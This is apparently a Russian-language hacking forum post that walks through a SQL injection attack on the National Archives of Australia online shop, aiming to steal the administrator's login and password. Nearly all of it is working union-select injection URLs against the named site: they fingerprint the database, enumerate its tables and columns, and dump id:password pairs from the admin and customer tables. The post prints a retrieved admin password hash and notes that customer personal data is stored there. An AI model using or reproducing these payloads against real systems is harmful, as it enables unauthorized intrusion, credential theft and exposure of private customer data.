Ух ты. Shop National Archives of Australia
Поставим перед собой задачу: достать логин/пасс админа. Действуем:
https://shop.naa.gov.au
Код:
https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+version(),2,3/*
version() - 5.0.20-Debian_1-log
user() - naa_webuser@www1.ipalm.net.au
database() - naacart
Версия > 5 это хорошо.
Код:
https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+table_name,2,3+from+information_schema.tables+limit+1,1/*
Находим интересную табличку admin. Изучаем ее:
Код:
https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+column_name,2,3+from+information_schema.columns+where+table_name=0x61646d696e+limit+0,1/*
Что имеем?
Код:
id, email_address, password, SiteID, Creation, LastUpdate, common_name
Заинтересовали id и password. Смотрим:
Код:
https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+concat_ws(id,0x3a,password),2,3+from+admin--
мм.. пока сохраним. Пойдем исследовать таблички дальше. Всего там 38 табличек.
Находим еще одну интересную - customer. Изучаем.
В ходе изучения выяснили, что таблица customer почти одинакова по строению с таблицей admin, только еще имеется личная инфа людей в этой БД и другое. Попробуем вытащить id и password из этой таблицы:
Код:
https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+concat_ws(id,0x3a,password),2,3+from+customer+limit+0,1--
Давайте узнаем ID и password первого админа:
Код:
https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+concat_ws(id,0x3a,password),2,3+from+admin+limit+0,1--
Получаем:
1 : 517c617e61a97d5d
Есть. ID и пароли мы получили. Что естественно было и нашей первоначальной задачей 